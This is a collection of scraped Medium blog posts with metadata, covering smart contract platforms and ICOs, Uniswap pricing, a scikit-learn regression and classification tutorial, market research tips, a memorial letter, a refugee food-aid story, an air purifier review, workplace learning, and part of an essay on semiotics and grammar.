Interestingly enough, it does not seem that another smart contract is directly cannibalizing Ethereum or “winning” the race to have the most adoption and/or development activity. Instead, other smart contract platforms are designing their features to cater to specific use cases, while Ethereum markets itself as “featureless.” Therefore, for the time being, the smart contract platform ecosystem appears to not be a winner take all market. Ethereum is still the clear market leader, and there are a great deal of resources and documentation available for developers to get started programming in Solidity, which gives Ethereum its edge over competition.
Out of 3,928 ICOs launched in the last 18 months, 91% of them have used Ethereum to run their token sale. Furthermore, 3.1% of ICO projects have opted to build their own blockchain.
Data from icoalert.com
Behind Ethereum, the platform with the second most ICOs is the Waves platform. Waves finds its niche by being quick, low cost and easy to use; an ICO can be run on its platform without the need for technical know-how. Furthermore, Waves helps address the liquidity problem with its built-in decentralized exchange.
Stellar has the third most ICO traction and caters to financial applications by allowing cheap and fast value transfer. Not far behind in fourth and fifth place are NEO and EOS. NEO has gained popularity in Asia due to its scalability and support for many programming languages. EOS, which launched its main-net in June, boasts new features such as readable account names, hacked account recovery, and more. EOS has fewer nodes in its system which makes it arguably less decentralized than Ethereum, but much more scalable. EOS is also the largest ICO in history, raising over $4 billion in its year-long token sale.
EOS, NEO, Waves, and Stellar all have the ability to scale to hundreds (if not thousands) of transactions per second, compared to Ethereum’s approximate 10 tx/s currently. However, what Ethereum lacks in scalability it makes up for in decentralization(and security). Similar to Bitcoin, anyone can become an Ethereum miner, and every node is required to process every transaction.
In conclusion, Ethereum now has some very real competition with the introduction of new consensus mechanisms and governance models. This does not mean Ethereum is destined to fail, however, it must adapt in order to survive in this dynamic market. Ethereum is currently evolving to include emerging concepts to solve the scaling dilemma such as plasma, sharding, and the Casper protocol. Will Ethereum be able to implement these improvements in time? Or is the Ethereum killer out there lurking? Only time will tell.
An interesting note — all of this software is open source; each project can easily copy features (such as readable account names) from others. However, consensus models and governance structures are fundamental changes in the protocol, and are NOT easily copied without starting from scratch.
For a more in depth analysis on competing smart contract platforms, check out my colleague Peter Keay’s articles here. | https://medium.com/ico-alert/ico-insights-ep-1-smart-contact-platforms-ethereums-dominance-662c11083c10 | ['Joseph Argiro'] | 2018-11-10 23:45:34.584000+00:00 | ['News', 'Smart Contracts', 'Articles', 'Blockchain', 'Ethereum'] |
Uniswap Complements Decentralized Exchanges | Uniswap achieved a transaction volume of $28,000,000 in the last 24 hours. According to CoinMarketCap, this number is around half of Gate.io ($54,000,000) and one-third of Bitfinex ($84,000,000). With such a high volume of daily transactions, Uniswap is indeed more popular than most decentralized exchanges.
Let me give you a brief introduction on Uniswap first. We have several keywords: Constant product, automatic market-making, censorship-free token-listing, token-to-token swap.
Unlike the pending order mechanism adopted by most exchanges, Uniswap uses a token-to-token swap method. How many B tokens can a certain amount of token A exchange for depends on the proportion and quantity of the two tokens that liquidity providers injected to the liquidity pool.
Exchange rates for an ERC20 token are calculated based on an equation:
x * y = k . The exchange rate of a token will always be at a particular point lying on the resulting curve of this equation.
. The exchange rate of a token will always be at a particular point lying on the resulting curve of this equation. k is a constant value that never changes, whereas x and y represent the quantity of Token A and Token B available in a particular exchange that ultimately determines the exchange rate.
Any user can contribute to liquidity pools for any ERC20 token, and therefore gain commissions in the form of exchange fees for doing so, with a certain degree of risk of course. It’s worth mentioning that Uniswap does not charge any fee throughout the process.
If you want Uniswap to support the trading between two tokens, you achieve so by creating a liquidity pool and add tokens to it, which is completely permissionless.
For example, I created a liquidity pool for ETH and ABC, and put 10 ETH and 1000 ABC in it. Now the exchange rate of ETH and ABC follows 1000 ABC = 1 ETH. If a trader wants 5-ETH worth of ABC, according to the following Constant Product Principle,
10 * 1000 =(10+5)* (1000 — X)
X stands for the quantity of ABC that the trader will get, which is 333 in this case. Now, there are 15ETH and 667 ABC in the liquidity pool and the price of ABC raised to 44 ABC=1 ETH。
It’s not hard to tell that a high price slippage may occur when the liquidity is low, which is also why some tokens increased tenfold or even hundredfold in price recently.
Uniswap has the following main advantages and adoption scenarios thanks to its characteristics and utilization,
Very suitable for small and quick token-to-token swap Meet the needs of token issuance by small teams Perfect for tradings that don’t require registration and authorization Enrich the variety of tools thanks to its open database
The fourth point I mentioned above is quite useful and interesting. Developers can conduct data analysis, like every transaction on-chain, and make some rather powerful and practical DeFi DApps.
However, Uniswap has its challenges:
Not suitable for big transactions, as it highly depends on liquidity and has high slippage. Makes it easier to do evil, as there it doesn’t require any verification process.
Overall, Uniswap is an addition to decentralized exchanges, without the capability to fully replace the pending order mechanism. The two may merge into one in the near future, which is not technically complicated. | https://medium.com/@tokenpocket-gm/uniswap-complements-decentralized-exchanges-8eefb7315efa | [] | 2020-07-21 08:24:41.690000+00:00 | ['Ethereum', 'Tokenpocket', 'Defi', 'Wallet'] |
Regression Versus Classification Machine Learning: What’s the Difference? | The difference between regression machine learning algorithms and classification machine learning algorithms sometimes confuse most data scientists, which make them to implement wrong methodologies in solving their prediction problems.
Andreybu, who is from Germany and has more than 5 years of machine learning experience, says that “understanding whether the machine learning task is a regression or classification problem is key for selecting the right algorithm to use.”
Let’s start by talking about the similarities between the two techniques.
Supervised machine learning
Regression and classification are categorized under the same umbrella of supervised machine learning. Both share the same concept of utilizing known datasets (referred to as training datasets) to make predictions.
In supervised learning, an algorithm is employed to learn the mapping function from the input variable (x) to the output variable (y); that is y = f(X).
The objective of such a problem is to approximate the mapping function (f) as accurately as possible such that whenever there is a new input data (x), the output variable (y) for the dataset can be predicted.
Here is a chart that shows the different groupings of machine learning:
Unfortunately, there is where the similarity between regression versus classification machine learning ends.
The main difference between them is that the output variable in regression is numerical (or continuous) while that for classification is categorical (or discrete).
Regression in machine learning
In machine learning, regression algorithms attempt to estimate the mapping function (f) from the input variables (x) to numerical or continuous output variables (y).
In this case, y is a real value, which can be an integer or a floating point value. Therefore, regression prediction problems are usually quantities or sizes.
For example, when provided with a dataset about houses, and you are asked to predict their prices, that is a regression task because price will be a continuous output.
Examples of the common regression algorithms include linear regression, Support Vector Regression (SVR), and regression trees.
Some algorithms, such as logistic regression, have the name “regression” in their names but they are not regression algorithms.
Here is an example of a linear regression problem in Python:
import numpy as np import pandas as pd # importing the model from sklearn.linear_model import LinearRegression from sklearn.cross_validation import train_test_split # importing the module for calculating the performance metrics of the model from sklearn import metrics data_path = “http://www-bcf.usc.edu/~gareth/ISL/Advertising.csv" # loading the advertising dataset data = pd.read_csv(data_path, index_col=0) array_items = [‘TV’, ‘radio’, ‘newspaper’] #creating an array list of the items X = data[array_items] #choosing a subset of the dataset y = data.sales #sales # dividing X and y into training and testing units X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1) linearreg = LinearRegression() #applying the linear regression model linearreg.fit(X_train, y_train) #fitting the model to the training data y_predict = linearreg.predict(X_test) #making predictions based on the testing unit print(np.sqrt(metrics.mean_squared_error(y_test, y_predict))) #calculating the RMSE number #output gives the RMSE number as 1.4046514230328955
Classification in machine learning
On the other hand, classification algorithms attempt to estimate the mapping function (f) from the input variables (x) to discrete or categorical output variables (y).
In this case, y is a category that the mapping function predicts. If provided with a single or several input variables, a classification model will attempt to predict the value of a single or several conclusions.
For example, when provided with a dataset about houses, a classification algorithm can try to predict whether the prices for the houses “sell more or less than the recommended retail price.”
Here, the houses will be classified whether their prices fall into two discrete categories: above or below the said price.
Examples of the common classification algorithms include logistic regression, Naïve Bayes, decision trees, and K Nearest Neighbors.
Here is an example of a classification problem that differentiates between an orange and an apple:
from sklearn import tree # Gathering training data # features = [[155, “rough”], [180, “rough”], [135, “smooth”], [110, “smooth”]] # Input to classifier features = [[155, 0], [180, 0], [135, 1], [110, 1]] # scikit-learn requires real-valued features # labels = [“orange”, “orange”, “apple”, “apple”] # output values labels = [1, 1, 0, 0] # Training classifier classifier = tree.DecisionTreeClassifier() # using decision tree classifier classifier = classifier.fit(features, labels) # Find patterns in data # Making predictions print (classifier.predict([[120, 1]])) # Output is 0 for apple
Wrapping up
Selecting the correct algorithm for your machine learning problem is critical for the realization of the results you need.
As a data scientist, you need to know how to differentiate between regression predictive models and classification predictive models so that you can choose the best one for your specific use case.
Do you have any comments or questions?
Please post them below. | https://medium.com/quick-code/regression-versus-classification-machine-learning-whats-the-difference-345c56dd15f7 | ['Dr. Michael J. Garbade'] | 2018-08-11 14:49:16.361000+00:00 | ['Machine Learning', 'Classification', 'Machine Learning Ai', 'Regression'] |
How can you achieve assured results from your market research initiatives? | The common misconception amongst a lot of business owners is that just because you’re employing market research, you’ve got it right! However, what is of utmost importance here is how well you conduct the research and what you do with the intellect found! Employing market research in only half the battle won!
In order to win the whole battle and take the victory leap, you’ve to make one hundred percent effort in deriving the best possible and most accurate data out of your research initiatives. Taking minute details into consideration across the process is a good step, to begin with.
The following are a few simple ways to make your market research process and result-derivation highly effective.
1- Clearly define your scope- First things first, before venturing into anything, what’s of utmost importance is to clearly lay down the objectives of the research, the process, and what you intend to achieve out of it. Assign your activities a tangible touch-point- it can be your target audience or your potential competitors. Having a clearly defined process from the start will accelerate the results in the right direction.
2- Asking the right questions- More often, what comes down with research is that the right people are asked wrong questions or unimportant ones. Make a fine mix of quantitative and qualitative questions for your audience. Make it easier for them to answer. And most importantly, make sure that when the answers come in as a whole, they make up for something useful for you to look at.
3- Make the process simpler for the respondents- Get one thing straight, the simpler the process is, the more easily you’ll be able to get it out of your respondents. Therefore, see to it that you make the research and data gathering funnel very simple, easy to access, time-effective, and uncomplicated for the respondents.
4- Follow-up- Lastly, when the data has come in and it is in the processing stage, don’t overlook the “following up” bit. Extend your thanks for their valuable time and make them feel appreciated. This paves a smoother way for the upcoming research funnels. You can also engage with them later on the progress bit of the concurrent survey that they were a part of. After all, it’s all about engaging with your customers, isn’t it? | https://medium.com/@ibigrs123/how-can-you-achieve-assured-results-from-your-market-research-initiatives-82f8c1fbb8 | ['Ibi Global Research Solutions'] | 2021-12-23 11:27:27.502000+00:00 | ['Market Research Reports', 'Market Research', 'Misconception', 'Research', 'Market Research Companies'] |
Dear Uncle Scott, | Hey, it’s Julianne. Grace and Fred Ho’s daughter? I mostly go by J now, though.
When I was little, I was part of a play group. The play group was an excuse for our parents to hang out, really; they’d have house parties, there’d be food, there were other kids, and the parents would play games and laugh and laugh and laugh. As I got older, I stopped going. But from when I was young, too young to actually remember how old I was, I remember my Uncle Scott.
Uncle Scott was, frankly, an amazing guy. He didn’t have kids, but if we got restless, he would be the one to wrestle with all seven or eight of us. He’d listen to our plans to storm the upstairs bedroom and take it from the younger kids, and cross his heart that he wouldn’t tell them about our Nerf guns. He was a great friend to our parents, but we just knew he was a great friend to us, and I loved him like family.
Uncle Scott had brain cancer. Honestly, that might not have been it; we were too young to be told, really, what was going on. I don’t remember when he left, either. For some reason, I thought he’d moved to Florida. No idea who told me that. As a little kid does, I assumed he was coming back, and then after a while I stopped remembering to ask about him. It was only in the last few years that it occurred to me that he must’ve died.
A year after a very different death, many years after I saw you last, I asked my mom about you. She told me that you moved to Michigan to be closer to your parents. I guess your father died while you were there, and pretty soon you were in hospice and you went too. I don’t know when, but I guess really soon after you left. Wish I could remember when that was.
She was really surprised, you know. I guess Justin doesn’t remember you, but I think that he must. Maybe not your name, but I don’t think he could forget your presence. I’ll be real though, even though I think I can recall your face, I’m never really sure if it’s quite right.
A lot has changed, but why wouldn’t it? Auntie Teresa and Uncle Sanford got a divorce, that family with tons of kids is expecting their tenth (but I guess they wouldn’t have been that huge when you knew them). We still went to the Pongs’ for a few years after you, but I stopped going as I got older and busier. Kinda regret that now.
Justin, Nathan, and I went to college this year! I haven’t talked to them in a while, but Justin is going to Northeastern and Nathan is going to UC Santa Barbara in the fall. There’s this thing called COVID-19 that’s keeping everyone home, so I’m not sure if they actually went or not.
A long time after I lost touch with them, I threw myself into a sport, of all things. I’m playing Division 2 basketball now, and I’m proud to say that I love it just as much now as I did when I could barely run a lap, maybe even more so. If we weren’t chin-deep in a world-wide pandemic, I would’ve wanted you at some of my games.
All in all, I’m not sure why I wrote this. There’s no way that I can catch you up on years and years of major life events that you’ve had to miss. I guess this is my way of saying goodbye, now that I know that I should’ve all that time ago (but how would I have known? I was 6). I hope, that despite everything, you left happy. I hope you left knowing that you were loved, and that you are remembered. I hope that you still laugh as much as you used to. Goodbye Uncle Scott, I’ll see you again sometime. | https://medium.com/@julianne-h14/dear-uncle-scott-d50ead213aad | ['Julianne Ho'] | 2020-12-18 08:27:13.823000+00:00 | ['Growing Up', 'Short', 'Reminiscence', 'Memories', 'Deceased'] |
“I don’t want my children to be talking to WFP in 25 years” | Hinda was born in eastern Ethiopia 25 years ago to Somali parents. Violence in Somalia prompted them to seek shelter across the border. Hinda has never stepped foot inside Somalia. She’s never left Somali region where her parents settled. She’s an animated woman with an answer for everything and grins every time she looks into the eyes of her eight-month daughter Sumaya.
But when I ask her about her ambitions and hopes for Sumaya, she pauses, looks down and says:“I want to go home, but I don’t know where that is.”
Hoping it’s not forever
I met Hinda sheltering from the noon sun at one of two distribution points in Kebribayah refugee camp. Established in 1991, it’s the oldest camp in Ethiopia and is home to 15,000 refugees, mostly Somali. She’s been receiving food assistance from the World Food Programme (WFP) for as long as she can remember. It has become a source of stability and familiarity in her life.
Noticing that she hadn’t got any food with her yet she was at the back of a distribution centre, I ask her why she was there. She explains that her allocated day was tomorrow but she attended today because the centre is a social hub for mothers in the camp.
Sumaya clings to her mother as Hinda explains: “I grew up on WFP food, and now her family is doing the same. I hope it’s not forever — I don’t want my children to be talking to WFP in 24 years.”
Only option to survive | https://medium.com/world-food-programme-insight/i-dont-want-my-children-to-be-talking-to-wfp-in-25-years-8f9a916d39aa | ['Edward Johnson'] | 2020-01-17 10:07:34.555000+00:00 | ['Food Assistance', 'European Commission', 'Ethiopia', 'Somalia', 'Refugees'] |
Coway Airmega 150 review: a compact air cleaner | The Airmega 150 deviates quite a bit from the last couple of Coway air purifiers we’ve reviewed. Compact and low-key, it eschews smart tech for easy operation and a sub-$200 price tag and removes pollutants from your indoor air with minimal noise and fuss.
The Airmega 150 has a slim, unfussy design. Measuring 13.4 x 6.5 x 18.5 inches (WxDxH) and weighing a hair over 12 pounds, it comes in white and sage green finishes with little adornment. Its space-saving size makes it easy to slot into any room without having to rearrange the furnishings.
[ Further reading: The best indoor air-quality monitors ]Despite its compactness, it provides 214 square feet of coverage making it perfect for medium-sized rooms and small apartments. It has a Clean Air Delivery Rate (CADR) of 138 for smoke, 161 for dust, and 219 for pollen. These rates reflect the purifier’s effectiveness in removing indoor the relative air pollutants based on room size and the volume of clean air produced per minute, with higher CADR numbers indicating increased effectiveness.
Coway The compact, minimal design fits well in any room.
The purifier uses a three-stage filtration system: a pre-filter that captures large dust particles, mold, and pet and human hair; a deodorizing filter; and a Green True HEPA filter that removes pollutants and allergens such as pollen. The “true” indicates the HEPA filter’s efficiency; in this case, the ability to capture up to 99.97 percent of 0.3 micron particles.
Real-time readings are conveyed through a color-coded air quality indicator on the purifier’s control panel. A blue reading means the air quality is “good,” and degrading air quality is indicated by green, yellow, and then red. The system works well enough for providing at-a-glance reports, but you must walk over to the unit whenever you want to check in, and you obviously can’t check the air status from another room. That’s not a big deal for most use cases, but if you want to use the purifier in a baby’s nursery or another situation where you don’t want to disturb the room’s occupant, the lack of a companion app for remote monitoring and control could be a significant drawback.
The flip side is that without the need to pair the purifier to an app, the setup is extremely easy. You just need to remove the front cover, take out the filters and remove them from their packaging, then arrange them in sequence and close the cover.
Coway The Airmega 150 displays the current air quality reading via a color-coded LED on its control panel.
The Airmega 150 has three fan speeds plus an Auto mode that optimizes the speed setting based on current air quality. These are controlled by a single button that cycles through the Auto/1/2/3 settings in order until the appropriate indicator lights up. While the lowest manual setting is virtually inaudible, Coway says the fan speed noise level ranges from 19.98 to 48.3 dB.
I used the Airmega 150 in the downstairs level of my condominium. Leaving it in the auto setting allowed me to see how the purifier responded to changing conditions. The air quality indicator glowed blue as soon as I turned the purifier on and stayed that way unless someone stirred up dust or was cooking. Then the fan automatically kicked into higher speeds as the air quality light dropped down through green, yellow, and red levels and ran until the level was back in the “good” zone.
The air-quality sensor, which determines the pollution level and adjusts the fan accordingly, is set to standard sensitivity by default. I found that adequate in my testing. If the air quality stays at the poorest level for more than two hours or reads “good” for more than one hour but just doesn’t seem clean, you can adjust the monitoring sensitivity. You do this by simultaneously pressing the power and fan-speed buttons for two seconds, then pressing the speed button until the speed indicator light glows for the desired sensitivity: 1 for “high,” 2 for “standard,” 3 for “low.”
Coway The pre-filter can be easily removed for bi-monthly cleaning through an open slot.
As with any air purifier, keeping the Airmega 150 in top condition is critical for accurate monitoring. That means regularly cleaning the air quality sensor and maintaining the filters, in particular. The sensor is easily accessed behind a removable cover on the right side of the purifier and requires cleaning every two months with a soft brush or vacuum cleaner. The pre-filter, which can be removed through its slot without removing the purifier’s front cover, should be cleaned every two weeks with a vacuum or water depending on how much debris has built up. The deodorizing and HEPA filters need to be replaced every six months and annually respectively. There are separate LED indicators for each of these two filters that light up when they reach the end of their lifecycle to ensure you don’t forget.
Overall, I found the Airmega Airmega 150 a pretty ideal air purifier for modest-sized spaces. Its minimalist design blends with any decor, and it is intuitive to operate right out of the box. While it doesn’t offer app control or integrate with other smart appliances, it also doesn’t have any of the attendant connectivity and interoperability hassles. And it accurately monitors and responds to changing air conditions, so you’re always breathing your best. That’s plenty to recommend it.
Note: When you purchase something after clicking links in our articles, we may earn a small commission. Read our affiliate link policy for more details. | https://medium.com/@robin54832608/coway-airmega-150-review-a-compact-air-cleaner-5c80227e93e0 | [] | 2020-12-07 13:10:36.260000+00:00 | ['Cutting', 'Headphones', 'Connected Home', 'Mobile'] |
Need to innovate faster? Embrace learning as a business imperative | Need to innovate faster? Embrace learning as a business imperative
“In times of change, learners inherit the earth; while the learned find themselves beautifully equipped to deal with a world that no longer exists.” Eric Hoffer
Image by Joshua Sortino
By Amy Marshall
We were already at a time of rapid change in organizations — and then COVID-19 massively forced even more literally overnight. It has been awe-inspiring to see what speed in innovation and problem-solving is possible with a clear-unifying north star and a burning platform — even if it is survival. We learned a lot and workers have been forced to flex and stretch their skills in new and uncomfortable ways to meet demands.
We can come out of this crisis stronger than ever — more creative, more resilient, more human. But crisis is not without its costs, as workers have been forced to manage unprecedented levels of personal and professional stress. It has taken a human toll (see COVID-19 workplace stress from the CDC), and the only thing we know for sure is that constant change will continue to be rapid and persistent. We will need to continue to learn and innovate our way out of this crisis. How can we do this in an accelerated way, without burning our people out, and sustain it as we emerge from crisis mode into a more “steady state” of still constant change?
To drive innovation and embrace rapid change, learning, now more than ever, needs to be viewed and prioritized as a strategic business imperative. Organizations need to invest in continuous employee learning and building it into the organization’s DNA. Teams need to identify and advocate for their unique needs to achieve critical business priorities. And individuals need to embrace and proactively drive their own personalized learning needs to suit their current and future role requirements and professional goals.
What and why of innovation?
Innovation (as compared to invention, according to Webster’s), means a new idea, method, or device, a novelty or the introduction of something new. It can feel like an overused buzz word or too big to define or reserved only for a R&D group. But in high-performing organizations, it is an outcome attainable for any level employee, on any day. It can be as big as a new business model or a large-scale product development, or as seemingly small as a novel feature to add to a system or a new process to more effectively run key meetings.
With this ever-increasing rapid pace of change and disruption, new skills and novel ways of staying ahead of competition and meeting customer needs will only become more important. Only 60 of the companies from the 1955 Fortune 500 company list were still in business in 2017 (fewer than 12 %), indicating the rapid pace of change and need for re-invention. We’re at the 4th industrial revolution and increasing automation of repetitive, low-cognitive tasks will require people to rapidly develop higher level cognitive skills and digital skills to be employable.
The ability to embed continuous learning, at the organizational, team, and individual level (not just the skills and knowledge themselves, but the ability to continuously learn, and to do so rapidly), is needed.
1. Learning at the organizational level
Learning for innovation requires investment, but has tangible ROI. IBM’s Smarter Workforce Study in 2013 revealed that 84% of employees in the best performing organizations are receiving the training they need, a full 68% better than worst performing companies. Microsoft just announced a major investment highlighting the burning platform for digital skills (especially data analytics, cloud, and software development) countering the decline of employer-funded training in the early 2000’s and stagnation since 2008. There may be an economic downturn now, but as organizations emerge and talent mobility picks back up, employees whose organizations invested in their development will not just perform better, but will also be more loyal (LinkedIn 2018 Workplace Learning: 94% would stay longer if their company invested in their career).
Learning for innovation needs to be built into an organization’s operating model, with specific designs for learning outcomes. To be successful, any people-related strategies (including learning) should always be rooted in the business strategy to drive which capabilities are needed for the workforce. This should be translated into a learning strategy that guides design of the operating model — (the processes, technology, tools, people, skills, practices, accountabilities, rewards, and culture needed to execute on the learning strategy. Since business strategies must be agile to meet ever-changing business needs, the learning operating model will also require agility and feedback built in to enable fast response.
Source: Slalom
This may sound daunting to an organization early on in taking a more strategic approach to learning, but it is recommended that you apply agile, iterative concepts by starting small and experiment, keeping future scalability in mind. It is critical to unite HR with business functions in a strategic partnership. Too often learning is viewed as an extra expense or something for HR or individual leaders to worry about rather than a top priority investment of the organization (e.g. technology). For example, in helping a major global pharmaceutical establish a new learning organization, we discovered that the company level learning strategy was articulated at a level too high to address unique needs for the targeted business unit. In response, a strategy, processes, org structure, and agile plan was created based on their unique needs. Senior leadership set the business strategy, HR established the workforce capabilities, and we built the learning strategy and operating model within the business to be closer to the need.
As with any major initiative, learning and development can’t take a “set it and forget it” approach. To be a real asset and achieve full ROI, learning needs to be woven into the fabric of daily work life, with a structured change approach and accountability to make the processes and learning stick.
2. Learning at the team level
The 70/20/10 learning model is nearly universally accepted at organizations acknowledging that only 10% of learning happens through formal instructional learning, another 20% comes through learning from others, and the bulk, 70%, comes from learning on the job. But too few organizations invest their time and money in a balanced way across these components — often focusing on the 10% instruction and letting the other 90% happen organically, informally, and thus more slowly. Learning focused at a more mid-level such as a team (or critical roles) offers a unique opportunity to help accelerate on the job and learning through others. Teams are where individuals spend most of their working time, and where they have the safe space to learn, make mistakes, and admit where they need help. Innovation requires creativity and risk-taking and thus the space to make mistakes. It is critical to create the psychological safety for this to feel normalized and accepted within working teams, where employees see that leaders and experts at all levels are continuously learning.
Creating targeted programs at a team or role level can be a low investment and rapid spin up, as they can tap into existing knowledge within the organization. Examples include: establishing or revitalizing communities of practice, accelerating higher numbers of technology certification for business workers, creating targeted learning paths for teams shifting to adopt new skills and ways of working, day to day coaching of agile teams and leadership teams, or encouraging formalized mentorship and sponsorship programs for underrepresented groups. Sometimes these efforts are spun up as passion projects by ambitious and/or desperate managers who realize the need. Unfortunately, organic, individually driven initiatives may lack staying power if leaders get busy or change roles or companies. Putting in structure and accountability enables programs to get off the ground faster, be sustained longer, and more efficiently utilize the busy time of in-house experts. It also enables an opportunity to explicitly factor in diversity (of thought and experience), another focus most organizations are finally waking up to also, to ensure employees are learning from diverse perspectives and backgrounds.
For example, we supported an organization to prepare for major organizational changes including high levels of departures, role changes and new hires. There was a huge risk of losing tacit institutional knowledge retained in the heads of long-tenured employees. A program was designed to manage knowledge transfer and incorporated approaches to build and sustain a learning and knowledge-sharing culture in day to day ways of working. This risk is present today for organizations who are dependent on heavy furloughs and maneuvering uncertainty. Simple practices like building in after-action reviews or retrospectives, sharing of learning goals and programs to train and encourage on feedback-giving, and regularly sharing experiences helps foster daily learning.
3. Learning at the individual level
Ultimately it is the individual learner that must be in the driver’s seat of their own learning and drive for innovation in daily life. Research has shown the ability to continuously learn new skills (learning agility) is critical to business success and a key indicator of leadership potential. Learning agility is demonstrated in 9 different ways:
· Flexibility (open to new ideas)
· Speed (acting on ideas quickly)
· Experimenting (trying new behaviors)
· Performance Risk Taking (seeking new activities/roles)
· Interpersonal Risk Taking (discussing differences with others)
· Collaborating
· Information Gathering
· Feedback Seeking, and
· Reflecting
These behaviors should be encouraged by organizations but require proactivity and motivation by individuals, especially in leadership roles.
However, there is significant room for improvement to promote and foster learning agility in action, especially related to risk-taking: Korn Ferry’s research found that companies with highly agile executives have 25% higher profit margins than their peer group; and that learning agility is a top predictor of high potential, but only 15% of the global workforce are highly agile.
In this ever changing COVID and competitive world, the reality is, we need to get comfortable being uncomfortable. Quoted in a 2011 talk, just before becoming CEO of IBM (the first woman), Ginni Rometty highlighted this importance of taking risks in order to grow. This is particularly true for women who are often socialized to be more risk-averse.
The shift in learning is increasingly to embrace personalized needs versus blanket learning solutions. Organizations can encourage fostering learning agility behaviors, and develop learning opportunities to tap into, but they will also need to drive individuals to find personal motivation to take action. Not just to take in new learning, but to apply that learning in action for deeper understanding and impact. Structured learning support in organizations can come in the form of self-directed learning, executive coaching, mentoring and sponsorship, and apprenticeship programs.
To put this into action, employees should set an explicit learning goal for themselves for this quarter, link it to broader goals that you find motivating, and find ways to make it stick (block time on your calendar for regular learning, identify specific next step action, and reach out to mentors and sponsors to discuss).
Wrapping it up
Notably there are complexities and costs to broader scale strategic learning support, but to remain competitive and drive more rapid innovation, organizations must think of learning more and more as a strategic business imperative. There are plenty of ways to start small. If your organization, team leaders, and yourself can embrace this, your organization will not only survive the crisis, they may innovate enough to help you thrive. If the pains of COVID have taught us anything, it is to seek out what really matters and what gives us fulfillment and meaning. An emphasis on continuous learning also has the ability to help us all seek out and perform work that we find meaningful and valuable to help us all reach for and realize our personal and organizational visions. | https://medium.com/slalom-business/need-to-innovate-faster-embrace-learning-as-a-business-imperative-9b4f8ff91fc3 | ['Amy Marshall'] | 2020-08-26 14:26:41.533000+00:00 | ['Innovation', 'Leadership', 'Business Strategy', 'Talent Management', 'Learning And Development'] |
Why Insane Linguists are Absurd | Preliminary Comments
Semiotics is the study of how a meaning (a definition) is developed. A sign is used by us to communicate a certain meaning of a reality which exists beyond this reality, while a symbol is used by us to communicate various meanings of a reality which all exist beyond this reality.
A sign only has a single meaning or definition; therefore, a sign can only be interpreted in a single way. A symbol has various meanings or definitions; therefore, a symbol can be interpreted in various ways. The same word may be either a sign or a symbol.
For example, the various definitions of the word, ‘impute’, are:
1. To attribute to a person; 2. To consider as the cause or source of; and 3. To ascribe a good or bad quality or condition.
The word, ‘impute’, may be used as a symbol so that its various meanings or definition are all possible interpretations of this word or this word may be used as a sign in which only one of these meanings or definitions can be applied.
In his excellent book, Language in Thought and Action, S.I. Hayakawa has described the attempt of some people to use all words as signs as the ‘One Word, One Meaning’ Fallacy. I describe the attempt of other people to use all words as symbols as the ‘One Word, Various Meanings’ Fallacy.
People want to use all words as signs so that there is no uncertainty in what is meant or defined. These people fail to understand that uncertainty is necessary because we can’t know all there is to know. People want to use all words as symbols so that the mystery of our experience is never totally understood. These people fail to realize that mystery is never in danger of being totally understood because the infinite details of our experience can never be totally comprehended.
A physical reality is often used to refer to a psychological reality. Unfortunately, some semanticists make the mistake of thinking that this physical reality is a symbol when it is used to refer to a psychological reality. The fact is that when we refer a physical reality to a psychological reality we aren’t making this physical reality a symbol, but are simply confusing this physical reality with one of our psychological realities. These semanticists have committed the mistake of confusing this physical reality for a sign or symbol. Semanticists are fond of saying, ‘The word is not the thing!’ They also need to realize that the thing is not a sign or a symbol.
For example, some people use the reality of a physically lighted candle to refer to the experience of psychological wisdom. This is how the word, ‘enlightenment’, became the symbol for our religions’ various interpretations of psychological wisdom.
A physically lighted candle is obviously not the experience of psychological wisdom; therefore, physical reality is not our psychological reality, even though, as real psyches, we are related to our physical world by way of our psychological realities (our psychological worlds) and energy. Consequently, the word, ‘enlightenment’, is not the reality of our psychological wisdom, although all religions use the word, ‘enlightenment’, as a symbol to refer to their own ‘brand’ of wisdom.
Semantics is meant or defined by my Funk and Wagnalls’ Standard College Dictionary as:
1. Ling [Linguistics]. The study and meaning of speech forms, especially of the development and changes in meanings of words and word groups. 2. Logic. The relation between signs or symbols and what they signify or denote… 3. Loosely, verbal trickery.
Syntax is meant or defined by the same dictionary as:
1. The arrangement and interrelationships of words in phrases and sentences.
We reasonably arrange and interrelate the meanings or definitions of words and word groups in phrases or sentences. We also logically (unreasonably) arrange and interrelate the meaningless signs we signify and the meaningless symbols we denote in equations and formulas. Unfortunately, Aristotle thought the grammar of his Greek language corresponded to the principles, rules, or laws of logic so he treated the grammar of his language as a predetermined formula or an equation in which to insert his words, rather than realize that he was absolutely free to improvise his grammar and choose his words in accord with his needs. This attempt of Aristotle to force our free use of grammar into the straight-jacket of logic’s principles, rules, or laws was his verbal trickery.
I contend that the attitude of a logician is dangerous to his (or her) psychological well-being, while the attitude of a linguist is usually more adapted to his psychological well-being, that is, if the linguist is not a logical linguist. I refer to the logical linguist as insane or malevolent because he has an insane or malevolent desire to enforce the principles, rules, or laws of logic, instead of a sane or benevolent desire to empower his needs. In other words, a logician is oriented to irresponsibly use power in such a way as to force compliance to his invented principles, rules and laws, rather than responsibly use power in his developed needs to motivate him to obtain his goals without the use of force. Consequently, this essay is concerned with semiotics because I will be showing how a person’s rational ultimate Truth is used by him to be the realistic foundation of his ability of arranging and interrelating the meanings or definitions of his words in improvised and meaningful phrases and sentences or how a person’s irrational ultimate ‘Truth is used by him to be the delusional foundation of his disability of arranging and interrelating signs and symbols, like numbers as well as words, in predetermined and meaninglessly formulas and equations.
The Sanity of Descriptive Grammar
A linguist’s approach to his language is related to whether he is using improvisation in his approach of descriptive grammar or using determination as his approach of prescriptive or normative grammar. A sane linguist uses descriptive grammar because she is reasonable. Descriptive grammar is a scientific approach to grammar because it is based on a speaker or writer’s choice of words which are improvisationally expressed by her in phrases and sentences which are in accord with her needs. An insane linguist uses prescriptive or normative grammar because she is unreasonably logical. Prescriptive or normative grammar is an unscientific approach to grammar because it is based on a speaker or writer’s choice of words which she rigidly attempts to fit into a predetermined logical formula or equation for speaking and writing which is in discord with her needs.
The insane linguist has no appreciation of poetry because poetry is reasonable, not logical. Poetry irritates the insane linguist because poetry is evidence that we need to improvise our expression of our words, while our use of principles, rules, or laws inhibits our ability to fulfil our need of improvisationally expressing our words.
That we don’t think about how to arrange our words in the sentences we speak when we are speaking freely is evidence that our use of descriptive grammar is spontaneous, while our use of prescriptive or normative grammar is the inhibition of our spontaneity and, thus, the inhibition of our ability to speak freely. When a person is not speaking freely, he is neurotic (if not psychopathically insane) because he is hiding his true motives or intentions behind his façade of principles, rules, and laws so that he will not have to reveal who he really is.
